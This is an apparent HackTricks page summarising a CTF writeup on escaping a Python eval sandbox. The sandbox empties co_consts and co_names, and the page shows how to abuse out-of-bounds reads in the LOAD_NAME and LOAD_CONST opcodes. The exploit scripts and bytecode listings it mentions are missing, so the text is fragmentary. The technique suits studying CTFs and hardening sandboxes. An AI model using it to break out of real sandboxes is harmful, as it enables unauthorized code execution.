LOAD_NAME / LOAD_CONST opcode OOB Read
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
This info was taken from this writeup.
We can use OOB read feature in LOAD_NAME / LOAD_CONST opcode to get some symbol in the memory. Which means using trick like (a, b, c, ... hundreds of symbol ..., __getattribute__) if [] else [].__getattribute__(...)
to get a symbol (such as function name) you want.
Then just craft your exploit.
The source code is pretty short, only contains 4 lines!
You can input arbitrary Python code, and it'll be compiled to a Python code object. However co_consts
and co_names
of that code object will be replaced with an empty tuple before eval that code object.
So in this way, all the expression contains consts (e.g. numbers, strings etc.) or names (e.g. variables, functions) might cause segmentation fault in the end.
How does the segfault happen?
Let's start with a simple example, [a, b, c]
could compile into the following bytecode.
But what if the co_names
become empty tuple? The LOAD_NAME 2
opcode is still executed, and try to read value from that memory address it originally should be. Yes, this is an out-of-bound read "feature".
The core concept for the solution is simple. Some opcodes in CPython for example LOAD_NAME
and LOAD_CONST
are vulnerable (?) to OOB read.
They retrieve an object from index oparg
from the consts
or names
tuple (that's what co_consts
and co_names
named under the hood). We can refer to the following short snippest about LOAD_CONST
to see what CPython does when it proccesses to LOAD_CONST
opcode.
In this way we can use the OOB feature to get a "name" from arbitrary memory offset. To make sure what name it has and what's it's offset, just keep trying LOAD_NAME 0
, LOAD_NAME 1
... LOAD_NAME 99
... And you could find something in about oparg > 700. You can also try to use gdb to take a look at the memory layout of course, but I don't think it would be more easier?
Once we retrieve those useful offsets for names / consts, how do we get a name / const from that offset and use it? Here is a trick for you:
Let's assume we can get a __getattribute__
name from offset 5 (LOAD_NAME 5
) with co_names=()
, then just do the following stuff:
Notice that it is not necessary to name it as
__getattribute__
, you can name it as something shorter or more weird
You can understand the reason behind by just viewing it's bytecode:
Notice that LOAD_ATTR
also retrieve the name from co_names
. Python loads names from the same offset if the name is the same, so the second __getattribute__
is still loaded from offset=5. Using this feature we can use arbitrary name once the name is in the memory nearby.
For generating numbers should be trivial:
0: not [[]]
1: not []
2: (not []) + (not [])
...
I didn't use consts due to the length limit.
First here is a script for us to find those offsets of names.
And the following is for generating the real Python exploit.
It basically does the following things, for those strings we get it from the __dir__
method:
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)